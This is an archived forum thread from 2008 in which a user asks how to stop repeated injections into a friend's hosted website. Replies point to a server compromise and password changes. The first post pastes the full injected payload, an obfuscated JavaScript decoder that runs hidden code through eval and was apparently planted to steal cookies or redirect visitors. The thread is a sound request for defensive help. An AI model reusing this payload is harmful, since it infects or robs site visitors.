PDA

View Full Version : Getting hacks everyday



allahverdi
06-18-2008, 08:08 AM
One of my friend's site getting hacks everyday. Someone adds this:

<script language=JavaScript>function jban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,43,42,27,7,60,12,11,20,14,0,0,0,0,0,0,59,18,48,30,44,0,51,50,21,53,22,37,38,40,2,1,39,45,47,9,36,6,33,10,54,16,17 ,0,0,0,0,61,0,62,13,49,24,3,26,25,56,55,58,29,35,52,4,23,31,5,19,34,15,46,41,8,28,32,57);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(179^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}jban('n1kioFbckN5cApDcE@wKiFkiJrSsoFbmU@QIkpxPn4DX43_L8aMXH4DmC3_Tk7QiJ@dVEAdVrNxBY@dT3p5cePwPxNhBfrbBk2kiHFbP4FSl8sv0Ap5XkU6iUi_I3jRm4R kPO7kioFQi32gLNfhVn9MLdAgVEAdV8sSKZ9Scfp_c3@dyOWhT33QX8R_c9AhyrN5cW0QI9UzIfe5Bp7QGSXbik3kTbawPfokBA@QIbAvL')</script>

How to defend??

djr33
06-18-2008, 08:16 AM
Does make any difference what is being done once hacked-- what matters is how his site is being accessed. Can't really help you there without more information.

allahverdi
06-18-2008, 08:29 AM
This is his site. (http://www.all4programmer.com)

Antivirus detected virus.

Same things in all sites in one hosting.

ddadmin
06-18-2008, 05:24 PM
Get your friend to contact his host asap about the breach. This isn't a JavaScript issue per say, but a server compromise that has allowed the hacker to inject arbitrary HTML onto his site pages. In this case, the HTML is in itself a vicious JavaScript code probably meant to steal cookie information or redirect users to another site, but it could easily have been just an offensive image instead. The point is, your friend's server has been compromised, and can only be fixed by someone with access to the server.

boogyman
06-18-2008, 05:45 PM
what ddadmin said is probably correct, however this could also be a password issue?

did your friend change his "cpanel" and/or ftp password? if yes and this is still happening, then it is the server itself that's being breached and not just his account

allahverdi
06-19-2008, 03:58 AM
what ddadmin said is probably correct, however this could also be a password issue?

did your friend change his "cpanel" and/or ftp password? if yes and this is still happening, then it is the server itself that's being breached and not just his account

Yes he changed.

And other accounts got same too...

Thanks ddadmin :)

hmsnacker123
06-20-2008, 12:10 AM
omg, i had my scanner turned off and i foolishly went on the link, is my pc infected????